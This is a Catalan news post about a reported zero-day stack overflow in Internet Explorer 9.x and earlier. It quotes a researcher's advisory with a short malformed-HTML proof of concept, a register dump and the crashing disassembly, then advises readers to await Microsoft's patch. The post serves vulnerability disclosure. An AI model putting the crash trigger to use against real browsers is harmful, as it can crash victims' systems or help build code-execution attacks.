Esteu aquí

Zero day a MS-Explorer 9.x i anteriors

No hi ha massa informació de moment però sembla ser que s'ha trobat una vulnerabilitat no detectada fins al moment i de la qual no hi ha fins ara cap forma de mitigar-la.

En una nota a Paste-KDE Jean Pascal Pereira ha publicat una prova de concepte que demostra com es pot explotar aquesta vulnerabilitat, què podria permetre l'execució de codi arbitrari en el PC de la víctima després de produir-se un desbordament de buffer.


----------------------------------------------------------------------
Microsoft Internet Explorer 9.x 
Vendor: Microsoft Internet Explorer 9.x and below
Description:
The application is prone to a remote stack overflow vulnerability.
Successful exploitation may lead to arbitrary code execution.
 
----------------------------------------------------------------------
Proof Of Concept:
----------------------------------------------------------------------
<table></for xmlns="1">
<td><datetime><colgroup>
<id><dd><col>
</table><object>
<hr><base>
 
----------------------------------------------------------------------
Register Dump:
----------------------------------------------------------------------
EAX 800706BE
ECX 763FCDB3 RPCRT4.763FCDB3
EDX 00000000
EBX 0604393C
ESP 003FDDD4
EBP 003FDDE0
ESI 003FDE30
EDI 761AFA10 ole32.761AFA10
EIP 7629CF51 ole32.7629CF51
 
----------------------------------------------------------------------
Crash Instruction:
----------------------------------------------------------------------
7629CF36  8B4D E4     MOV ECX,DWORD PTR SS:[EBP-1C]
7629CF39  24 04      AND AL,4
7629CF3B  0FB6C0      MOVZX EAX,AL
7629CF3E  F7D8       NEG EAX
7629CF40  1BC0       SBB EAX,EAX
7629CF42  25 0A010180   AND EAX,8001010A
7629CF47  8901       MOV DWORD PTR DS:[ECX],EAX
7629CF49  8B45 E8     MOV EAX,DWORD PTR SS:[EBP-18]
7629CF4C  50        PUSH EAX
7629CF4D  53        PUSH EBX
7629CF4E  8975 D8     MOV DWORD PTR SS:[EBP-28],ESI
7629CF51  FF70 5C     PUSH DWORD PTR DS:[EAX+5C]
 
----------------------------------------------------------------------
At 0x7629CF51, a read access violation occurs.
----------------------------------------------------------------------
 
Jean Pascal Pereira || http://www.0xffe4.org

Caldrà estar atent al pegat de seguretat extraordinari o l'explicació que hi doni Microsoft. Mentre tant recordeu que teniu a la vostra disposició una serie de navegadors que, ben actualitzats, no presenten a hores d'ara cap problema.